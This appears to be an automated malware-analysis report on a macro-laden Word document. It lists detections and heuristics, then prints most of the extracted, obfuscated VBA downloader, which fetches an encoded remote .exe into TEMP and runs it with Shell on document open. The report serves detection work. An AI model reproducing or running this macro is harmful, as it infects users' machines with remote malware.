MALICIOUS
334
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample contains heavily obfuscated VBA macros, including an AutoOpen subroutine, which are designed to execute automatically when the document is opened. Critical heuristics indicate potential shell calls and the use of CreateObject, suggesting the execution of arbitrary code. The script attempts to download and write content to files using obfuscated strings, likely to stage a second-stage payload. The presence of the email address 'facepa1m@live.ru' in the document body suggests a potential phishing lure.
Heuristics 12
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set WQTQGAKEBGH = CreateObject(StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("534D")) + "XML2.XM" + "LHTTP") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WQTQGAKEBGH = CreateObject(StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("534D")) + "XML2.XM" + "LHTTP") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
OJFXJUFZDBX StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6578652E312F736567616D692F72612E6D6F632E617372616C67756A2E7777772F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22480 bytes |
SHA-256: 3b045ea11a533d57a5116e251e952424105c0072fdbddbb8d47fc6fd71514746 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
92 of 176 identifiers look randomly generated (e.g. 'F7768657471696F76687973667773616D736B6C6') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo tvietsifxltejgckqmmgmrcbsomenxpjixviepjrspnjwawf
Dim aeqbuamwtqbvjvypcjwyhwgocvnfrhuuhztdmxilnitxlhvz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6A6B656164716A6B766C6B636B7476677A7769746362667862756C6D6E6B70737570796F69636C6C746F746E6B747474")) For Binary As #72550
Put #72550, , aeqbuamwtqbvjvypcjwyhwgocvnfrhuuhztdmxilnitxlhvz
Close #72550
tvietsifxltejgckqmmgmrcbsomenxpjixviepjrspnjwawf:
GoTo ewcjymzoaevdzyvjazueygipodfrxovhdiueruisckivkepj
Dim sgldmvavwxkebsqosfbdzligvdadglkzqvpxylfkakoqpybs As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("746D6F68637665766679707069786A73656B756579626579716F6E6F6D6C746B6666726E687A7077797965786D667974")) For Binary As #67769
Put #67769, , sgldmvavwxkebsqosfbdzligvdadglkzqvpxylfkakoqpybs
Close #67769
ewcjymzoaevdzyvjazueygipodfrxovhdiueruisckivkepj:
GoTo gxeahqpjtncnuuiiifsekwbafaofmqymvifhzyockvkzpqvg
Dim kgrgczrsyrxmnkoyraokqwiqegqfrrywrtzktlpqifapdtvy As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("64747869796D776F656268726F7A7362676277736D6473626C6976776C687670777A636270697479766D626276796166")) For Binary As #46448
Put #46448, , kgrgczrsyrxmnkoyraokqwiqegqfrrywrtzktlpqifapdtvy
Close #46448
gxeahqpjtncnuuiiifsekwbafaofmqymvifhzyockvkzpqvg:
TFCVDJEJBJJ
End Sub
Sub AutoOpen()
GoTo kjrrpzgsabomhoorpthijdgdaoabcyuzvsrgedwwmsnsuilt
Dim ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7966636E727179746861627661697576616668726B7461776C756E686F666E6C626B757A7064706F746579727664676D")) For Binary As #14926
Put #14926, , ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa
Close #14926
kjrrpzgsabomhoorpthijdgdaoabcyuzvsrgedwwmsnsuilt:
GoTo zxclhhlzyuaqvwvwqjgbpacemvtvqctrbetkqpxtxlyipguh
Dim tgoqwbboxfhncboupxwlmifubvyljuqmfpgcqfmezotebxtu As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("646773776B656E7872666D6B686668797A707463676A7A7179666461776E6F6E657A77786F73677865777365647A7377")) For Binary As #66158
Put #66158, , tgoqwbboxfhncboupxwlmifubvyljuqmfpgcqfmezotebxtu
Close #66158
zxclhhlzyuaqvwvwqjgbpacemvtvqctrbetkqpxtxlyipguh:
GoTo tkhhqtykjmddycwbqjacyxjzqdlosoxdbfxsjyjphsxgfcml
Dim ifvrgbyiwkehdashidhbtvoerqhmrxmzdebugxeyzppmjguu As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("646665717964676D71766E7976627A7A70736E787A796E676176796E646E6A76756F646B6D636B7875697A7161726478")) For Binary As #18642
Put #18642, , ifvrgbyiwkehdashidhbtvoerqhmrxmzdebugxeyzppmjguu
Close #18642
tkhhqtykjmddycwbqjacyxjzqdlosoxdbfxsjyjphsxgfcml:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo oqmkqvhvgglixxgdeiqugjubjgrtdcfvhkoneujdrfmhowox
Dim izevzwvzxpbbnwiosqkjcyfovxczkxslfvkxxgccublumkfo As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("68787972656A686F6261737A666A7779647770767579696C696661766B636A6B7470626E6F7A7A787471746375746974")) For Binary As #58396
Put #58396, , izevzwvzxpbbnwiosqkjcyfovxczkxslfvkxxgccublumkfo
Close #58396
oqmkqvhvgglixxgdeiqugjubjgrtdcfvhkoneujdrfmhowox:
GoTo hgdvfhmrvyunvofmnaztrdrohoygveofkrvxcuwobwnsxndy
Dim qgbijyndlqbeckbkcbynjvlfyksjytayhdacdvoscyjzcqld As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7573707A76706970717565756B6D63716675677767647278656464627862727369656875676877626F63616774776E62")) For Binary As #45653
Put #45653, , qgbijyndlqbeckbkcbynjvlfyksjytayhdacdvoscyjzcqld
Close #45653
hgdvfhmrvyunvofmnaztrdrohoygveofkrvxcuwobwnsxndy:
GoTo ymzncmuqdcrcounjmauyzgjokauhhxvaqfvdxzqawhldldaq
Dim rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("746B66716E6666797A797A696972657463656868716C746962787065687867687A656563726E7668666D646B776A6C6E")) For Binary As #4136
Put #4136, , rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva
Close #4136
ymzncmuqdcrcounjmauyzgjokauhhxvaqfvdxzqawhldldaq:
Auto_Open
End Sub
Function OJFXJUFZDBX(ByVal XDQPBMZWZVE As String, ByVal EBDHKIKBOCB As String) As Boolean
Dim WQTQGAKEBGH As Object, ZIOOUFBOHTB As Long, JFDTBJWPCNU As Long, WGZWKGZMUTY() As Byte
GoTo yvuwsrazyiisipxwfxnmtwdddrxfrxyhpjatavceqitibxcw
Dim noomoioacetxmsbkxbpvdakojfpuwgqkeafeaqfrpntloaze As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6273686E6C637A6A6364666B7466766975626267686B64657962676B77786F6170756C7579627761716D636767777670")) For Binary As #64012
Put #64012, , noomoioacetxmsbkxbpvdakojfpuwgqkeafeaqfrpntloaze
Close #64012
yvuwsrazyiisipxwfxnmtwdddrxfrxyhpjatavceqitibxcw:
GoTo aunblnywsfxrcgmgjymmzpccgpyizhtitprlxayuvznbmusm
Dim xfdphiyuvozyusdfdsmgugnrnjyrpbmwoffjeqfiyqukyocq As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("76656D7366746975706B6A7769666F64676B786B6C6A6677656E696968726E6C6D6779756B756F767161786B77676169")) For Binary As #10771
Put #10771, , xfdphiyuvozyusdfdsmgugnrnjyrpbmwoffjeqfiyqukyocq
Close #10771
aunblnywsfxrcgmgjymmzpccgpyizhtitprlxayuvznbmusm:
GoTo fcujfbuvupxoqdxykcgiirybxsceqjvednkniotwmygvotyg
Dim dylhaesazsntbxtzxybpianywgwuqkebpxwvrzbkueaykfxm As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("726C777766776278646C6E76667764776372656F717A7A64666770736E757A73646662646A6C73666E676B687A6E746A")) For Binary As #54749
Put #54749, , dylhaesazsntbxtzxybpianywgwuqkebpxwvrzbkueaykfxm
Close #54749
fcujfbuvupxoqdxykcgiirybxsceqjvednkniotwmygvotyg:
Set WQTQGAKEBGH = CreateObject(StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("534D")) + "XML2.XM" + "LHTTP")
GoTo etykedjbyspakazrkblfewqzzldfmiyxdwqwjdzbaqxotivm
Dim xmqryjdnjdnhjjyzaakypxoemwzosmzbfbajzdqxbykdnfmf As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("697171697166676B7161797565736D7373797766717A6F626F6470726E67726A69706E6F6E76647364787A6E7674736B")) For Binary As #93927
Put #93927, , xmqryjdnjdnhjjyzaakypxoemwzosmzbfbajzdqxbykdnfmf
Close #93927
etykedjbyspakazrkblfewqzzldfmiyxdwqwjdzbaqxotivm:
GoTo tbjfqntgvpeaydjcuxajidnqcamgvpinthdmlfrzibrmyjdq
Dim baznastnamdofjzrqbghyjqhdtexfmhsvekzlukrdmtdoawi As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("666E6A786F62656B6B7A787A736A7A79616A67727978647878796E6D7776647576716C6C77656D656269626872716D73")) For Binary As #99385
Put #99385, , baznastnamdofjzrqbghyjqhdtexfmhsvekzlukrdmtdoawi
Close #99385
tbjfqntgvpeaydjcuxajidnqcamgvpinthdmlfrzibrmyjdq:
GoTo ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa
Dim scxrtmsbbhuxzamqgzlaeiniejfshglmjxkxnycawlrudvxn As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6577676965777565736D6576676B6C6F7A6F647A62766662796E6465736369776873797A79656A626F74667568767062")) For Binary As #49723
Put #49723, , scxrtmsbbhuxzamqgzlaeiniejfshglmjxkxnycawlrudvxn
Close #49723
ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa:
WQTQGAKEBGH.Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("544547")), XDQPBMZWZVE, False
GoTo zunbokaebjkkpdfsorqdryntqayzlmmtdvjyclgdrvlkfrsn
Dim losjthfhetkotljdoxjkcwybkdqfneiufwwuhmeifwzmlrbp As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("686570657967767165766675627770637970696A62706F6D747A6468726E6E6E65766570776F74766768737A636F6972")) For Binary As #93594
Put #93594, , losjthfhetkotljdoxjkcwybkdqfneiufwwuhmeifwzmlrbp
Close #93594
zunbokaebjkkpdfsorqdryntqayzlmmtdvjyclgdrvlkfrsn:
GoTo jnmaepzvcmcgyemhvjuiqixqroflxqlmjsjlfngdtbkjvtri
Dim cdzjqiclzdbsssxkxipzbaopihjvmswrgtczphetfacsiqrl As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6376756C716F697464666F746E76696669677461796872796E646E7066756473676E7065637873796574667A6962676C")) For Binary As #24967
Put #24967, , cdzjqiclzdbsssxkxipzbaopihjvmswrgtczphetfacsiqrl
Close #24967
jnmaepzvcmcgyemhvjuiqixqroflxqlmjsjlfngdtbkjvtri:
GoTo gykhtvritlsfjqrvyqbtgnhzwmjkbkjcxjypsnejbqunxbjj
Dim artfttcsyfviaqpientxyrcyrbdecdvsrsocvbrvikwbjqyx As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6B6C6F6773627774677772716C69636969727A6F7167737076757068697674706D6A6C787167676769706D6561736A79")) For Binary As #15654
Put #15654, , artfttcsyfviaqpientxyrcyrbdecdvsrsocvbrvikwbjqyx
Close #15654
gykhtvritlsfjqrvyqbtgnhzwmjkbkjcxjypsnejbqunxbjj:
WQTQGAKEBGH.Send "send request"
GoTo iflnsluawvesielvggfzcwfauiswaxumzymhgfcjihlurjuc
Dim jytesgsmhwjvwcyokyimpljuvszduwwtkrirzqyqqdbvuiaz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6A6F6E6470637777657A6A70767561706B7A6C676E656E6B796A787A6167777474697171756465687A796C6666756566")) For Binary As #93215
Put #93215, , jytesgsmhwjvwcyokyimpljuvszduwwtkrirzqyqqdbvuiaz
Close #93215
iflnsluawvesielvggfzcwfauiswaxumzymhgfcjihlurjuc:
GoTo rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva
Dim idyalbclkpypymzqlimrcpwoglbqpnwcucufwuzeqqbzqvjy As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("737973697A6867627A70716F67696F78676E6F746D746B717961766D7361657578656A67726D6F726F6664636A6A6A65")) For Binary As #44516
Put #44516, , idyalbclkpypymzqlimrcpwoglbqpnwcucufwuzeqqbzqvjy
Close #44516
rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva:
Do While WQTQGAKEBGH.readyState <> 4
GoTo jenelkrmoiwjctfgchdugaietjfulqrratojnfidemrzbjct
Dim yzidgrlzdhpsqlcrbkeiipywtmgqfptckpkiddfeaoikwoqe As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6E616E6E66796D73726B6D73616A6A7A757669706876766D6C74676F6F6E66676C62766C78796A647963696863706977")) For Binary As #15346
Put #15346, , yzidgrlzdhpsqlcrbkeiipywtmgqfptckpkiddfeaoikwoqe
Close #15346
jenelkrmoiwjctfgchdugaietjfulqrratojnfidemrzbjct:
GoTo mlovgratjrnllbpqxkpszjhrzcgxzhssgyujodnreoxyuhkz
Dim twxhswfkxzmpffcqxyyjddvbobmglopfgdzkszgafghjxhft As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("616F72626375696C63696E65757A7776647A76696E6C727172737872656B7A617A656A6C656C7A676A6A6A6B7A777170")) For Binary As #79332
Put #79332, , twxhswfkxzmpffcqxyyjddvbobmglopfgdzkszgafghjxhft
Close #79332
mlovgratjrnllbpqxkpszjhrzcgxzhssgyujodnreoxyuhkz:
GoTo cngjophlhlaerzqcqkgqqpsylquqoseevuvtbmtjhbwmmmkd
Dim lybzzpuublebeedhcyuzuiwldyushrlxryyaedbsdxmtbgzz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6B69746A6E617A7875797174757274776767766B736173736D6D6976657A78736164636D756A77666D63727478626879")) For Binary As #54113
Put #54113, , lybzzpuublebeedhcyuzuiwldyushrlxryyaedbsdxmtbgzz
Close #54113
cngjophlhlaerzqcqkgqqpsylquqoseevuvtbmtjhbwmmmkd:
DoEvents
GoTo sksgvmyfbqfqwrjblkiciyqhmlmzqkmllurzlvjggqchnzsx
Dim ydzjpmkquhwcnnnghydbivxqcthmyvvqzoumptaazfhexjrl As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7878656472746E6B716D6B6D7369746E6F777971756372616A77617865676C7275696875757867786F75676872656B71")) For Binary As #31535
Put #31535, , ydzjpmkquhwcnnnghydbivxqcthmyvvqzoumptaazfhexjrl
Close #31535
sksgvmyfbqfqwrjblkiciyqhmlmzqkmllurzlvjggqchnzsx:
GoTo vqalrslhuzphtlsdkbmobrjdssipmscsypzvcdsiydmwazht
Dim nymbxrfxkcoveimsrzmghxuofbznhhopejlrjcaiyvqrrcup As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("676161677868726268706C73697171776372696A69706764626D706D74766A7A6E666C76697963646E7661666B666965")) For Binary As #64724
Put #64724, , nymbxrfxkcoveimsrzmghxuofbznhhopejlrjcaiyvqrrcup
Close #64724
vqalrslhuzphtlsdkbmobrjdssipmscsypzvcdsiydmwazht:
GoTo lagwdpdxntmedbqxmsbtxycbuiwzqumfuqznvqljbvqfpsau
Dim sbuurrvjkcusjbxqzypgmjveqzitglsvwavnmjoeaurcivuv As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7164667A7776736A6A64657168766C64636674726B6E6C7361736E717177706D7A776D65636E6370686D6B706668626A")) For Binary As #26230
Put #26230, , sbuurrvjkcusjbxqzypgmjveqzitglsvwavnmjoeaurcivuv
Close #26230
lagwdpdxntmedbqxmsbtxycbuiwzqumfuqznvqljbvqfpsau:
Loop
GoTo cftqfjesisnvxjpppghxdtbnlsmxoirpatjkixisfgnfdaui
Dim obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6F7768657471696F76687973667773616D736B6C6774717A676C717363677571666C6771756C766B747073627A667372")) For Binary As #45703
Put #45703, , obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg
Close #45703
cftqfjesisnvxjpppghxdtbnlsmxoirpatjkixisfgnfdaui:
GoTo yxhxmqjxguiiokjsfdrpllickkgdsiethftamtqpuvfsubsp
Dim sdtaawgymgkgwhtpeltmhpzqmuyihgychufitikvqaofhydd As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("697A76706D756C77626574726166666975626478726B72656C7A67686173677079757A716266676D6C6F796470756D62")) For Binary As #76073
Put #76073, , sdtaawgymgkgwhtpeltmhpzqmuyihgychufitikvqaofhydd
Close #76073
yxhxmqjxguiiokjsfdrpllickkgdsiethftamtqpuvfsubsp:
GoTo xzdxhkqykhjnkdksqillbkfapoxvnoplarrupaeqprmlklpr
Dim vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6877787669646A666164697A616F686E6F6D616969796B7462756D786A6E6262767A70626373726575626A7862746D6C")) For Binary As #36412
Put #36412, , vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz
Close #36412
xzdxhkqykhjnkdksqillbkfapoxvnoplarrupaeqprmlklpr:
WGZWKGZMUTY = WQTQGAKEBGH.responseBody
GoTo whrtdopgfyarcmoxdznzdkbrudivbgclczkufqaafarplvxq
Dim ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("776979626A6F77646572727161776267747468677876797762707476686C726A6E74667A706771757966666B6D6C6477")) For Binary As #36932
Put #36932, , ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln
Close #36932
whrtdopgfyarcmoxdznzdkbrudivbgclczkufqaafarplvxq:
GoTo cviwofypzrfkpcitpvyvxymevgcavmslffjkmyhnzrfjzncw
Dim wfpwlsdejymosxzqggezbxojbjvngupdmxvshzcrfvqibhis As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("797365756E67747273746A736A7676626A74736A697674637264706F646C6F656A627272657679737978797078766876")) For Binary As #52543
Put #52543, , wfpwlsdejymosxzqggezbxojbjvngupdmxvshzcrfvqibhis
Close #52543
cviwofypzrfkpcitpvyvxymevgcavmslffjkmyhnzrfjzncw:
GoTo kfoeuzrhmobunubpzfucazzrpxlpqakrysyutriugvvdkdyg
Dim znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6D7A6870756E767176666A756D6F6B6361706F7A6C6A78626E7862687262727A667764736E6C6D6C657A69736B676262")) For Binary As #85087
Put #85087, , znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr
Close #85087
kfoeuzrhmobunubpzfucazzrpxlpqakrysyutriugvvdkdyg:
JFDTBJWPCNU = FreeFile
GoTo dvxcjrcqpmppjgataoipuumtuqudsvzmtuojmwyoyllgcejr
Dim mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("697972766D676A7A657A65637A6B626F78716B736A6C626E7874666B716363686D72737771687363666A796F6B6B6772")) For Binary As #52213
Put #52213, , mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff
Close #52213
dvxcjrcqpmppjgataoipuumtuqudsvzmtuojmwyoyllgcejr:
GoTo qksfssrpvyzhbgsfofhrrirpxcclktlqvnvwvphivfahkors
Dim hhkdszcfbqtoigknyzvpcgfyvpprjlnutxatpojjudvgzdxu As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6479656F6C6C687274676A68616D747068796D73777862646362777275686B636A636677777677747070686D6D786D7A")) For Binary As #21932
Put #21932, , hhkdszcfbqtoigknyzvpcgfyvpprjlnutxatpojjudvgzdxu
Close #21932
qksfssrpvyzhbgsfofhrrirpxcclktlqvnvwvphivfahkors:
GoTo xtnntzfnjirgnvgkkbfexcwpniqavuwfmdbfmqhxknktqbsy
Dim unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("656963646868796B7A756F627372626977756C6C6C64746C637A626462626B766C736276657468726967697870767865")) For Binary As #94786
Put #94786, , unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan
Close #94786
xtnntzfnjirgnvgkkbfexcwpniqavuwfmdbfmqhxknktqbsy:
If Dir(EBDHKIKBOCB) <> StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("")) Then Kill EBDHKIKBOCB
Open EBDHKIKBOCB For Binary As #JFDTBJWPCNU
Put #JFDTBJWPCNU, , WGZWKGZMUTY
Close #JFDTBJWPCNU
GoTo zvhlmxngcwdplmebjvnvfslubgunooafoqqhrvmnzsxxpive
Dim oykwcqeuinjafltacteansekjvvndegfqjspgqqnwqrqxemk As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6369706B68656F656D796A646461787862746C6F78797A706A65746E736E7773767563647A646E697762746264716579")) For Binary As #66433
Put #66433, , oykwcqeuinjafltacteansekjvvndegfqjspgqqnwqrqxemk
Close #66433
zvhlmxngcwdplmebjvnvfslubgunooafoqqhrvmnzsxxpive:
GoTo vugfguuculrmcygvqofyanmqcdsysdfhudllyzkhniohbgce
Dim todkoejyvdojjvfstsvlyihddmylxolxrcttirjghwxgocee As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6D6866756B6A7264656773666D65796971626B696A69666B716176686868757A776F786D6D6D66726666627567696573")) For Binary As #17433
Put #17433, , todkoejyvdojjvfstsvlyihddmylxolxrcttirjghwxgocee
Close #17433
vugfguuculrmcygvqofyanmqcdsysdfhudllyzkhniohbgce:
GoTo kpdizktstaknibldzbygeeqiewmrkfhilpigziuqatagyjmm
Dim fjshjbsjssevacjjprwnrzduyzipwbhbkkkhsdvcllwvomri As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6662687166686E6F71797962716B776A616171727775617463746F6B6C6B6E6D66777465697173637178656979686C69")) For Binary As #37495
Put #37495, , fjshjbsjssevacjjprwnrzduyzipwbhbkkkhsdvcllwvomri
Close #37495
kpdizktstaknibldzbygeeqiewmrkfhilpigziuqatagyjmm:
Dim WBVSWOEAZVI
GoTo obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg
Dim llisqzvgbrzirlvtggitxfcvccujdgkgqgmqqsaivpoxjqtd As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("796F746674777075706866736C7378637079666978767268776F746C68766A657264676C776F77746F78696164767565")) For Binary As #37803
Put #37803, , llisqzvgbrzirlvtggitxfcvccujdgkgqgmqqsaivpoxjqtd
Close #37803
obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg:
GoTo acdzmexadpyjfwdnllfvvgtfbpmrckccufdctixgjkipvaob
Dim dcsztvhicaobtmssdfdowdzlbtcgqkozoujpdcqfyghdwcfg As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6F6973726F75697A6E786D726D6A62717070656F6E676475626E786376636B71656F73706973616A756C6F706B6F786A")) For Binary As #87419
Put #87419, , dcsztvhicaobtmssdfdowdzlbtcgqkozoujpdcqfyghdwcfg
Close #87419
acdzmexadpyjfwdnllfvvgtfbpmrckccufdctixgjkipvaob:
GoTo vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz
Dim pkalhllqyyttauhldsfnrtdfvxkxieytstktuikxkgbebcoq As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("76647375707A636F716D66776F6C69616971626F726A73787174656A6C61746C68716A656A65746C7261767570677168")) For Binary As #45331
Put #45331, , pkalhllqyyttauhldsfnrtdfvxkxieytstktuikxkgbebcoq
Close #45331
vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz:
WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
GoTo ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln
Dim hrfarvprcnlkpiqfysyoffssluvjamqmwgaylboqazosdhyc As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6C687275627561737776786B6E6170767A7062756475657861737567707362636D65666F61676E636A6861797A687173")) For Binary As #27456
Put #27456, , hrfarvprcnlkpiqfysyoffssluvjamqmwgaylboqazosdhyc
Close #27456
ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln:
GoTo nqakatzcqsccbbahspnrewrjsvrwtsomigbpwkiuvmyxttix
Dim fhrleckfhvlcsfrzeiafiltjtbaddjwfoiawautcavgbgral As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7678636461696D7666656774766D7176706162626164647A796B796B6D71687073617378746F62637A676B71686D6D6F")) For Binary As #96511
Put #96511, , fhrleckfhvlcsfrzeiafiltjtbaddjwfoiawautcavgbgral
Close #96511
nqakatzcqsccbbahspnrewrjsvrwtsomigbpwkiuvmyxttix:
GoTo znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr
Dim kqmrhxurssufslgwruvbekdofvnvcmbfvxlcdhpzkseagovd As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6970737277726D6D6B717267776A7A78747A716E767171646B6F6B7A6973767068676F756377646A7663796D746E7374")) For Binary As #33966
Put #33966, , kqmrhxurssufslgwruvbekdofvnvcmbfvxlcdhpzkseagovd
Close #33966
